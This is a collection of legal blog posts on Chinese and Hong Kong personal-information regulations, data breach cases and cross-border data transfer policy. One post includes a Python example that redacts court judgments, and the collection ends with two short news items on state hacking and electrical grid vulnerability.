  • The Provisions establish a system by which consumers can make complaints and file reports. They establish a reporting and handling center under the auspices of the Ministry of Industry and Information Technology, through which reports of “nasty” (不良) or junk short messages can be processed. They also clarify procedures under which infringements and violations involving text messages can be handled, and under which punishments can be meted out.
  • The Provisions strengthen the oversight and inspection system. They clarify the authority and duty of the regulatory authority to carry out oversight and inspection, and the corresponding duties of SMS providers.
  • The Provisions establish penalties for unlawful behavior among SMS providers, short messaging content providers, personnel of the supervisory authority, and personnel of the reporting and handling center. Violations are subject to being recorded in a permanent file, and responsible persons may be subject to “supervisory discussion.”

Apart from regulating conventional SMS, the Provisions also extend to information delivery services similar to SMS that use the Internet. Article 38 of the Provisions provides that delivery services which send information having the characteristics of a short message (for example, text, data, voice or images) to fixed telephones, mobile telephones and other communications end-users, via the Internet, shall be conducted with reference to the Provisions.

By their terms, the Provisions only affect the use and transmission of text messages. This makes them rather specific in their scope and impact. The Provisions have, however, the potential to materially increase operational requirements for those companies which rely on the use of text messages. They also clarify how such companies may be held accountable.

In the abstract, the Provisions are a particularly fine-grained illustration of China’s ongoing reliance on a sector-by-sector approach to the development of its regulatory framework on personal information.

American Chamber of Commerce in China Publishes Policy Spotlight Report on Protecting Data Flows between China and the U.S.

On April 14, 2015, the American Chamber of Commerce in China (“AmCham”) published a report, entitled Protecting Data Flows in the US-China Bilateral Investment Treaty (the “Report”). The Report is part of AmCham’s Policy Spotlight Series. While in principle addressed to the U.S. and Chinese teams that are currently negotiating the Bilateral Investment Treaty, the Report has been made public. It thereby provides insight into the emerging issue of data localization for the benefit of a much wider audience.

The Report analyzes the impact of data localization policies, challenging the widely held (but potentially false) belief that greater data security can be achieved through local storage of personal data. In challenging this belief, the Report highlights the magnitude of the possible adverse economic impact of data localization policies and their potential effect on innovation. The Report contrasts data localization policies against the more liberal policies that are intended to foster freer international flows of personal information, which have been adopted in several jurisdictions in the Asia-Pacific region. The Report concludes by advocating against the adoption of data localization policies, recommending instead the inclusion in the Bilateral Investment Treaty of provisions that would foster and protect international transfers of data by service providers.

Hunton & Williams and its Centre for Information Policy Leadership (“CIPL”) participated closely in the drafting of the Report. The final document reflects policy positions taken from the international perspectives frequently advocated by CIPL and lawyers at Hunton & Williams. The Report also includes a clear reference to the Accountability principle, a concept CIPL helped develop as a guiding principle to govern cross-border data flows. In addition, the Report conspicuously references the APEC Cross-Border Privacy Rules system.

The Report was publicly released at a panel discussion event held at AmCham’s facility in Beijing on April 14.

In May and June of this year, delegations from CIPL will travel to Singapore and Hong Kong to meet with data protection authorities, and further expound upon and advocate the adoption internationally of the Accountability principle. These will be the next steps in CIPL’s continuing advocacy for robust cross-border data flows, and against data localization policies, in the Asia-Pacific region.

China’s State Administration for Industry and Commerce Publishes Measures Defining Consumer Personal Information

On January 5, 2015, the State Administration for Industry and Commerce of the People’s Republic of China published its Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers (the “Measures”). The Measures contain a number of provisions defining circumstances or actions under which enterprise operators may be deemed to have infringed the rights or interests of consumers. These provisions are consistent with the basic rules in the currently effective P.R.C. Law on the Protection of Consumer Rights and Interests (“Consumer Protection Law”). The Measures will take effect on March 15, 2015.

Article 11 of the Measures provides a list of actions that enterprise operators may not undertake because they infringe upon the personal information of consumers. In October 2013, we reported on the amendment to the Consumer Protection Law which extended the protections of personal information to consumer personal information. The list provided in Article 11 of the Measures is similar in concept to the amendment to the Consumer Protection Law.

Although the list itself does not contain any surprises, Article 11 is nevertheless potentially an important development because it provides a definition of “consumer personal information.” (The amendment to the Consumer Protection Law omitted a definition of this term.) According to Article 11, “consumer personal information” refers to “information collected by an enterprise operator during the sale of products or provision of services, that can, singly or in combination with other information, identify a consumer.” Article 11 also provides a list of specific examples of “consumer personal information,” including a consumer’s “name, gender, occupation, birth date, identification card number, residential address, contact information, income and financial status, health status, and consumer status.”

While this definition applies only in relation to consumer personal information, it is an instructive milestone in the continuing emergence of China’s sector-by-sector patchwork of rules and regulations governing the collection and use of personal information.

Hong Kong Privacy Commissioner Publishes Guidance on Cross-Border Data Transfers

On December 29, 2014, the Hong Kong Office of the Privacy Commissioner for Personal Data published guidance (the “Guidance Note”) on the protection of personal data in cross-border data transfers. The Guidance Note was released in light of the Privacy Commissioner’s intention to elaborate on the legal restrictions governing cross-border data transfers in Hong Kong, though these have not yet gone into effect.

Although the Hong Kong Personal Data (Privacy) Ordinance (the “Ordinance”) contains a provision (“Section 33”) imposing restrictions on cross-border data transfers, this provision did not go into effect when the rest of the Ordinance was enacted in 1995. Consequently, there currently is no effective legal restriction on cross-border data transfers in Hong Kong. As such, the new Guidance Note published by the Privacy Commissioner is voluntary and not binding. The Privacy Commissioner intends for the Guidance Note to be a practical guide that helps data users prepare for the cross-border data transfer restrictions of Section 33. The Privacy Commissioner noted, however, that no firm date has been set for Section 33 to go into operation.

Notably, the Guidance Note provides recommended model contractual clauses for cross-border data transfers of personal data outside of Hong Kong. The Privacy Commissioner’s Office does not require that the recommended model clauses be used verbatim. Instead, the Guidance Note advises the parties to make revisions or additions according to their own commercial needs.

FTC Warns Foreign-Based App Developer of Potential COPPA Violations

On December 22, 2014, the Federal Trade Commission announced that it notified China-based BabyBus (Fujian) Network Technology Co., Ltd., (“BabyBus”) that several of the company’s mobile applications (“apps”) appear to be in violation of the Children’s Online Privacy Protection Rule (the “COPPA Rule”). In a letter dated December 17, 2014, the FTC warned BabyBus of potential COPPA violations stemming from allegations that the company has failed to obtain verifiable parental consent prior to its apps collecting and disclosing the precise geolocation information of users under the age of 13.

BabyBus offers more than 60 free mobile apps marketed to children between the ages of one and six on popular app marketplaces in the U.S. In its letter, the FTC alleges that BabyBus apps are directed to children under the age of 13 in the U.S., and therefore, the foreign-based company is required to comply with the COPPA Rule by obtaining verifiable parental consent before collecting, using or disclosing the precise geolocation information of its users who are under the age of 13 in the U.S.

The letter recommends that BabyBus review all of its apps in order to ensure that the company lawfully collects personal information from children in accordance with the COPPA Rule’s legal requirements. Furthermore, the letter indicates that the FTC plans to review BabyBus apps again next month.

Chinese Supreme People’s Court Issues Interpretations Regarding the Publication of Personal Information on the Internet

In October 2014, the People’s Republic of China Supreme People’s Court issued interpretations regarding the infringement of privacy and personal information on the Internet. The interpretations are entitled Provisions of the Supreme People’s Court on Several Issues concerning the Application of the Rules regarding Cases of the Infringement of Personal Rights over Information Networks (the “Provisions”) and became effective on October 10, 2014.

China has not implemented a comprehensive data protection law. Rather, data protection and privacy are regulated through several sector-specific laws. Consistent with the sector-specific nature of the Chinese data protection framework and the Resolution on Strengthening the Protection of Information on the Internet, promulgated by the National People’s Congress in December 2012, the Provisions focus on the protection of personal information on the Internet.

In addition to providing rules on determining when Internet service providers were “aware” of an infringement, rules on determining fault arising from reprinting, unauthorized modification or deletion of personal information, and rules on relevant procedures for legal proceedings, the Provisions also attempt to describe the scope of information that is subject to its requirements, although they fall short of providing a definition of “personal information.” The contours of information covered by the Provisions likely will be further clarified as judges apply the Provisions to individual cases.

In general, the Provisions prohibit Internet users and Internet service providers from using the Internet (or other information networks) to disclose or publish personal information. The personal information protected by this prohibition includes, at a minimum, personal genetic information, medical records, health examination materials, criminal records, home addresses and information regarding private activities. Disclosure or publication on the Internet (or other information network) may be permissible, however, if:

  • The relevant individual consented in writing;
  • The disclosure or publication is in the public interest to a necessary extent;
  • An educational or scientific entity makes the disclosure or publication for purposes in the public interest, academic research or statistical analysis, the relevant individuals have consented in writing to the publication or disclosure and the method of disclosure or publication will not result in the identification of any individual;
  • The relevant personal information has already been published by the individual on the Internet, or has already become public via other means; or
  • The personal information is obtained through legitimate methods.

If the disclosure or publication falls into one of the final two categories identified above, however, the individual or entity that makes the disclosure or publication may be liable civilly if the method of publication violates the public interest or social morality, or if the publication harms a material interest of the individual whose personal information is disclosed or published.

Foreign Couple Found Guilty of Illegal Collection of Personal Information in Shanghai

On August 8, 2014, a court in Shanghai found a foreign couple guilty of illegal collection of personal information. British national Peter Humphrey was sentenced to two and a half years of imprisonment and a fine of RMB 200,000, and his wife was sentenced to two years of imprisonment and a fine of RMB 150,000. In addition, Humphrey will be deported after serving his term.

According to Chinese press reports, the defendants established a company in Hong Kong called ChinaWhys Co., Ltd. in 2003 and a company in Shanghai called Shelian Consultancy (Shanghai) Co., Ltd. in 2004. Using these company names, the defendants investigated many businesses and individuals for their clients, which mainly consisted of Chinese subsidiaries of multinational companies. The defendants purchased various types of personal information of Chinese citizens and used the information to prepare investigative reports, which they then sold to their clients.

This verdict, while newsworthy because of the involvement of foreign defendants, does not really break new legal ground in China. We have previously reported on amendments to the P.R.C. Criminal Law that established criminal penalties for improper sales, provision and collection of personal data. We also have reported on criminal sentences in cases involving the sale of personal data. The legal theories and arguments advanced in this case are well-established and not considered “grey areas” in Chinese law. For instance, foreign-related social and market investigations are subject to strict regulations, and the collection of personal information must be conducted carefully to comply with the law. In this case, the court rejected the defendants’ argument that their illegal investigation was justified because they undertook their actions for legal objectives.

There are other ways, however, in which the verdict may break new ground or lead to new practices. This case is reportedly the first in China involving a foreign (or at least Western) defendant found guilty of illegal collection of personal information. It is also worth noting that the defendants were arrested in August 2013, not long after one of their prominent clients came under investigation by the Chinese government for alleged bribery. Reportedly, this case is merely a small part of that larger bribery investigation.

The verdict will have an impact on business practices involving due diligence investigations, especially those performed for international firms. In an article published by The Wall Street Journal about the verdict, Hunton & Williams Partner Manuel Maisog noted that “It’s not just that the tactical business practices need to change, it’s the mind-set.” The verdict also may make senior business officers apprehensive about using this kind of investigative service to obtain information about their business partners or employees. While the lasting impact of this verdict will most probably unfold over the coming months or years, the old business models used by investigatory firms hired to conduct due diligence have become far riskier, and now can only be employed, if at all, with great caution.

FBI indicts five members of the Chinese military for hacking US companies

Eric Holder yesterday announced: “Today, we are announcing an indictment against five officers of the Chinese People’s Liberation Army for serious cybersecurity breaches against six American victim entities.” The five officers are known by the aliases UglyGorilla, Jack Sun, Lao Wen, hzy_1hx and KandyGoo. They are members of the PLA’s military unit 61398 (you may […]

Chinese Postal Bureau Issues Personal Information Protection Rules

In March 2014, the State Postal Bureau of the People’s Republic of China (the “SPBC”) formally issued three rules (the “Rules”) establishing significant requirements regarding the protection of personal information: (1) Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users (the “Security Provisions”); (2) Provisions on the Reporting and Handling of Security Information in the Postal Sector (the “Reporting and Handling Provisions”); and (3) Provisions on the Management of Undeliverable Express Mail Items (the “Management Provisions”). The Rules, each of which became effective on its date of promulgation, were issued in draft form in November 2013 along with a request for public comment.

The latest versions of the Rules generally retain most of what was contained in the original drafts. No material alterations were made to the personal information protection provisions, although some minor changes were made to the wording and the sequence of certain sentences was changed for conformity. Notably, the Security Provisions:

  • create a coherent framework for information security in postal and express delivery services;
  • define the “personal information of postal and delivery service users” (the “Users’ Information”); and
  • clarify the purpose and scope of application of the Security Provisions and the allocation of responsibilities in the event of information security incidents.

The Security Provisions also take a major step forward in encouraging enterprises to optimize information security management processes and use technical means to reduce the risks of disclosures of Users’ Information.

In addition to alleviating problems arising from the misappropriation of personal information used for postal and express delivery service purposes, the Rules also represent a positive development in China’s data protection legal regime and are the most recent addition to an expanding array of sector-specific regulations governing personal information in China. Companies operating in the postal delivery sector may need to modify and improve their business processes and service strategies to comply with the Rules.

Recent Data Breach Events in China

In recent months, the Chinese government has devoted attention to the protection of personal information with, as we previously reported, the promulgation of a number of new data protection regulations. This focus is also illustrated by recent actions related to crimes involving personal information.

Gang Selling Personal Information Busted

Police apprehended a 10-member gang in Beijing and Shanghai for illegally obtaining and selling nearly one million pieces of personal information. The gang made over RMB 320,000 in illegal profits from their activity.

In mid-August of this year, a woman in Shanghai filed a complaint with the police, claiming that her personal information was improperly disclosed after she had applied for an online exam. After applying, the woman received spam messages relating to training classes in the same subject matter. Zhabei District police investigated online message platforms and identified an education information consulting company as the source of the spam messages. When police apprehended the owner in the Pudong New Area, he said that he had bought the personal information from an unemployed local resident, who was then apprehended in the same district. Further investigation showed that this local resident had obtained the information from a man who was responsible for maintaining a national examination application website. This person had sold the data to the local resident, who then resold it to the education company owner and a few others, including the owners of another education company and a cultural communications company.

Courier Firm Staff under Suspicion of Large-Scale Customer Data Theft

Staff at a leading Shanghai courier firm, YTO Express, are suspected of selling millions of items of personal information about its customers to online traders, who then sold the information to online retailers.

A spokesperson for YTO Express said in October 2013 that it was investigating the case and promised to crack down on the information theft. It has since been verified that the personal information sold included customer names, addresses, telephone numbers and transaction serial numbers. Armed with this information, unscrupulous online retailers can forge customer records, while other businesses can use the information to contact potential customers. Since the incident, YTO Express has reportedly taken emergency measures to reduce security risks, and has begun to conduct a comprehensive internal investigation to search for the source of the improper disclosure of personal information. YTO Express is also reportedly working with its information technology partners to enhance the security of express delivery information.

Arrest of Three Men in Illegal Sales of Millions of Items of Personal Information

An employee at a local taxation bureau in Wuhan took advantage of his position to secretly copy personal information from the local taxation bureau’s intranet onto a USB memory drive. The employee then sold the information to another person via QQ, an instant messaging software, for an illegal profit of over RMB 100,000. The purchaser then resold the information to a third person. All three men were arrested for illegally obtaining personal information.

State Post Bureau of China Releases Draft Normative Rules Involving Personal Information Protection for Public Comment

On November 27, 2013, the State Post Bureau of the People’s Republic of China (the “SPBC”) released five draft normative rules for solicitation of public comment. Three of these rules, respectively entitled Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users (the “Draft Provisions”), Provisions on the Reporting and Handling of Security Information in the Postal Sector (the “Reporting and Handling Provisions”), and Provisions on the Management of Undeliverable Express Mail Items (the “Management Provisions”) contain significant requirements regarding the protection of personal information. The deadline for submitting comments on the rules is December 27, 2013.

Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users

The Draft Provisions were formulated in accordance with the Postal Law of the People’s Republic of China, the Measures for the Supervision and Administration of Security of the Postal Industry, and other relevant laws and regulations. The purposes of the Draft Provisions are to (1) strengthen the management of the security of users’ personal information in postal and delivery services, (2) protect the legitimate rights and interests of postal and delivery service users, (3) maintain the safety of postal correspondence and information, and (4) promote the sound development of the postal industry. The Draft Provisions apply to the supervision, administration, operation and use of postal and delivery services in China which involve the security of users’ personal information.

The Draft Provisions first define “personal information of postal and delivery service users” (the “Users’ Information”) as information used in the course of postal and delivery services. These include the name, address, ID number, telephone number and company name of the sender (and of the recipient), and the order number, delivery time and item details.

Second, the Draft Provisions set forth a number of general requirements for the protection of Users’ Information. These include:

  • Franchised express delivery enterprises must agree to clauses in the franchise agreement which establish safeguards for Users’ Information and specify the security responsibilities of the franchisee and the franchisor. When the franchisor suffers an information security incident, the franchisee must be required to take on its own responsibilities in the incident response;
  • A postal or express delivery enterprise must sign a confidentiality agreement with its operational staff to clarify confidentiality obligations in relation to Users’ Information, and must provide continuing training and education to develop the knowledge and skills of its operational staff with respect to the security of Users’ Information;
  • A postal or express delivery enterprise must establish a mechanism for handling complaints relating to the security of Users’ Information;
  • Whenever a postal or express delivery enterprise is engaged by operators (such as e-commerce operators and TV shopping operators) to provide delivery services, the agreement between the parties must include security clauses for the protection of Users’ Information, which specify the scope of information use, security protection measures for information exchanges and allocation of responsibilities in the event of information security incidents;
  • When entrusting a third party to input Users’ Information, a postal or express delivery enterprise must ensure that the third party is qualified to undertake information security safeguards, and must bear responsibility for information security incidents caused by the third party; and
  • No postal or express delivery enterprise, or operational staff thereof, may transfer any Users’ Information to any third party without express authorization under law, or without the users’ written consent.

Third, in addition to the foregoing requirements, postal or express delivery enterprises are required to strengthen the management of the security of physical and electronic information appearing on the waybill, for example:

  • A postal or express delivery enterprise must strengthen the management of its business and processing locations and physically isolate the user service area from the mail (or express mail) processing and storage sites. To prevent the physical information from being stolen or leaked, non-staff must be strictly forbidden from entering such sites or from viewing mail items (or express mail items).
  • To prevent malicious code from destroying information systems and networks, and to avoid disclosure or alteration of information, postal and express delivery enterprises must install necessary antivirus software and hardware, set up measures to encrypt the delivery of Users’ Information through public networks, and strengthen their management of system passwords and of the security of electronic Users’ Information storage.

Finally, violations of the Draft Provisions may result in penalties including administrative warnings, fines and (under certain circumstances) even criminal liability.

Provisions on the Reporting and Handling of Security Information in the Postal Sector

The Reporting and Handling Provisions define “security information which should be reported and handled” as emergency and operational information relating to the security of the daily processes of postal or express delivery enterprises. The Reporting and Handling Provisions apply to the reporting and handling of this security information by postal or express delivery enterprises, or by postal administration authorities.

Under the Reporting and Handling Provisions, when Users’ Information has been illegally disclosed, postal or express delivery enterprises are required to report security information without delay to their local postal administration authorities and public security departments. If more than 500 items of Users’ Information have been illegally disclosed, local authorities must report the incident to the provincial postal administration authorities within two hours after they receive the report.

Provisions on the Management of Undeliverable Express Mail Items

The Management Provisions are intended to promote the freedom and privacy of correspondence and to protect the legitimate rights and interests of express delivery clients and their correspondents. The Management Provisions emphasize that, at times when undeliverable express items are held in custody and are being processed, no express delivery information may be misappropriated or illegally provided to others.

Conclusion

The three draft rules contain specific provisions on the protection of personal information in the postal industry. Once promulgated, the rules will have nationwide effect. The promulgation of these rules will likely alleviate problems arising from the misappropriation of personal information that is used in postal and express delivery services. In light of the emergence of markets that trade in personal information in a variety of fields, however, regulating the handling of personal information solely in the postal sector is insufficient; regulation of the other sectors in which opportunities to sell personal information exist is also needed. Until an integrated, national Personal Data Protection Act that governs the handling of data protection in all industry sectors is adopted, markets for trading in personal information in China are likely to persist.

Read our previous coverage on Chinese personal information protection issues.

People’s Bank of China Issues Administrative Measures for Credit Reference Agencies

On November 15, 2013, the People’s Bank of China (the “PBOC”) issued its Administrative Measures for Credit Reference Agencies (the “Measures”) – eight months after the Administrative Regulations on the Credit Information Collection Sector (the “Regulations”) became effective on March 15, 2013. The Measures, which will take effect on December 20, 2013, were formulated to enhance the supervision and regulation of credit reference agencies and to promote positive developments in the credit information services sector.

The Measures are intended to complement the Regulations, which established a series of rules for the collection, use, processing, disclosure and transfer of personal information by credit reference agencies. The Measures provide more detail, by clarifying and specifying rules for the establishment of credit reference agencies that deal with the personal credit information of individuals (“personal credit reference agencies”). The Measures require a personal credit reference agency to first apply for pre-approval for a License for Personal Credit Reference Business from the PBOC before the agency may incorporate. In contrast, credit reference agencies that deal with enterprises’ credit information may be incorporated first, and then file with the relevant local PBOC counterpart. The Measures also require the personal credit reference agency to comply with a set of technical information security standards with respect to their credit reference business, and undergo regular assessments by a third-party institution that is qualified to assess information security safeguards.

Also pursuant to the Measures, a credit reference agency may be subject to enhanced surveillance by the PBOC (or its local counterpart) under certain circumstances, such as when the agency (1) is involved in a serious data breach incident, (2) shows signs of a possible data leakage, (3) is having major financial difficulties, (4) has been the subject of numerous complaints, or (5) has failed to comply with its reporting and appraisal obligations.

The implementation of these detailed rules for establishing and running personal credit reference agencies (and other compliance requirements) offers yet another example of the increased attention paid to personal information protection issues by the Chinese government.

Read our previous coverage on Chinese personal information protection issues, including our post on the Supreme People’s Court of China passing of the Provisions on the Online Issuance of Judgment Documents by People’s Courts.

China’s Supreme People’s Court Releases Provisions on the Online Issuance of Judgment Documents by People’s Courts

On November 21, 2013, the Supreme People’s Court of China passed the Provisions on the Online Issuance of Judgment Documents by People’s Courts (the “Provisions”), which will take effect on January 1, 2014. The Provisions replace earlier rules (of the same title) enacted by the Supreme People’s Court on November 8, 2010, and generally focus on improved implementation of the principles of standardizing the online issuance of judgment documents, promoting judicial justice and enhancing the public credibility of the judiciary.

The Provisions also contain a number of requirements for the protection of personal information. These requirements provide that:

  • Judgment documents involving state secrets, personal private matters or cases involving juvenile delinquency shall not be published on the Internet.
  • When issuing online judgment documents, a People’s Court shall delete the following information: (1) the home address, contact information, ID number, bank account number and any other personal information of a natural person; (2) relevant information of a juvenile; (3) the bank account number of an entity or other organizations; (4) business secrets; and (5) other content inappropriate for release on the Internet.
  • A People’s Court shall retain the real information of the name or title of the party concerned upon issuing online judgment documents, but the names of the following parties or litigants shall be processed anonymously through the use of alternate symbols: (1) the parties and their statutory agents in marriage and family cases or inheritance disputes; (2) victims and their statutory agents, witnesses and expert witnesses in criminal cases; (3) any defendant who is sentenced to fixed-term imprisonment of not more than three years and is exempted from criminal punishment (and who is not a recidivist or habitual offender).
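
The deletion and anonymization rules in the three items above describe a redaction routine, so here is one as an added example (not code from the Supreme People’s Court or from any court system). It works on a constructed judgment record, deletes the fields item (2) lists, replaces the names of the party categories in item (3) with stable placeholders, and scrubs identifiers that also appear in the body text. The record layout, the role names, the “Party A/B/C” placeholders, the simplified case-type mapping and the identifier formats (18-character resident ID, 11-digit mobile number, 16 to 19 digit bank card number) are all assumptions made for the example; the defendant rule follows the wording of the Provisions as summarized on this page.

```python
import re
from copy import deepcopy

# Which roles are pseudonymised, keyed by case type. Simplified from item (3) of the
# Provisions; the role and case-type names are assumptions for this example.
ANONYMISE_ROLES = {
    "marriage_family": {"party", "statutory_agent"},
    "inheritance": {"party", "statutory_agent"},
    "criminal": {"victim", "victim_agent", "witness", "expert_witness"},
}

# Structured fields a court deletes before online publication (item (2) of the Provisions).
DELETE_FIELDS = ("home_address", "contact", "id_number", "bank_account")

# The same identifiers when they appear inside the judgment text. Formats are assumptions:
# 18-character PRC resident ID (last character may be X), 11-digit mobile number
# beginning with 1, and 16 to 19 digit bank card number. The ID pattern must run before
# the bank-card pattern, because an all-digit ID would otherwise match as a card number.
ID_RE = re.compile(r"\b\d{17}[\dXx]\b")
PHONE_RE = re.compile(r"\b1\d{10}\b")
BANK_RE = re.compile(r"\b\d{16,19}\b")


def _pseudonym_table(doc):
    """Map each name that must be hidden to a stable placeholder (Party A, Party B, ...)."""
    roles = ANONYMISE_ROLES.get(doc["case_type"], set())
    table = {}
    for p in doc["parties"]:
        hide = p["role"] in roles
        # Item (3)(3) as worded on this page: a defendant sentenced to at most three years
        # who is exempted from punishment and is not a recidivist or habitual offender.
        if doc["case_type"] == "criminal" and p["role"] == "defendant":
            hide = (p.get("sentence_years", 99) <= 3
                    and p.get("exempted", False)
                    and not p.get("recidivist", False))
        if hide and p["name"] not in table:
            table[p["name"]] = "Party " + chr(ord("A") + len(table))
    return table


def redact_judgment(doc):
    """Return a copy of `doc` prepared for online publication; the input is left untouched."""
    out = deepcopy(doc)
    table = _pseudonym_table(out)
    for p in out["parties"]:
        for field in DELETE_FIELDS:
            p.pop(field, None)
        if p["name"] in table:
            p["name"] = table[p["name"]]
    text = out["text"]
    # Longest names first, so a short name that is a substring of a longer one is not clobbered.
    for real, alias in sorted(table.items(), key=lambda kv: -len(kv[0])):
        text = text.replace(real, alias)
    text = ID_RE.sub("[ID REDACTED]", text)
    text = PHONE_RE.sub("[PHONE REDACTED]", text)
    text = BANK_RE.sub("[ACCOUNT REDACTED]", text)
    out["text"] = text
    return out


# Constructed sample record; the people, numbers and dispute are invented for the example.
SAMPLE = {
    "case_type": "inheritance",
    "parties": [
        {"role": "party", "name": "Zhang Wei", "home_address": "12 Nanjing Rd, Shanghai",
         "id_number": "31010119800101123X", "contact": "13800138000",
         "bank_account": "6222021234567890123"},
        {"role": "party", "name": "Zhang Li", "id_number": "310101198505051234"},
        {"role": "lawyer", "name": "Wang Fang"},
    ],
    "text": ("Plaintiff Zhang Wei (ID 31010119800101123X, tel 13800138000) and defendant "
             "Zhang Li dispute the estate. Counsel Wang Fang appeared. Funds were held in "
             "account 6222021234567890123."),
}

if __name__ == "__main__":
    print(redact_judgment(SAMPLE)["text"])
```

The placeholder table is built per document, so “Party A” in one judgment has no relation to “Party A” in another, which is what keeps the published corpus from being re-linkable across cases. Counsel keeps a real name because the Provisions only anonymize the listed categories; the regex pass exists because the structured fields are not the only place an ID or account number can surface.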

The Provisions are intended to make the judicial system more independent and more transparent. At the same time, it remains to be seen how easily searchable the judgment opinion network will be after the Provisions are implemented. The Provisions represent the latest step in the ever-growing array of sector-specific regulations governing personal information in China, and may suggest that legislative and regulatory activities for the protection of personal information will continue.

The U.S. Electrical Grid More Vulnerable Than Ever

The U.S. electrical grid is more vulnerable today than it has ever been. Cyber attacks have the potential to disrupt large segments of the electrical grid, and top experts confirm that the U.S. is not prepared for this risk. Watch the 60 Minutes Video.


The post The U.S. Electrical Grid More Vulnerable Than Ever appeared first on Quick Start Survival.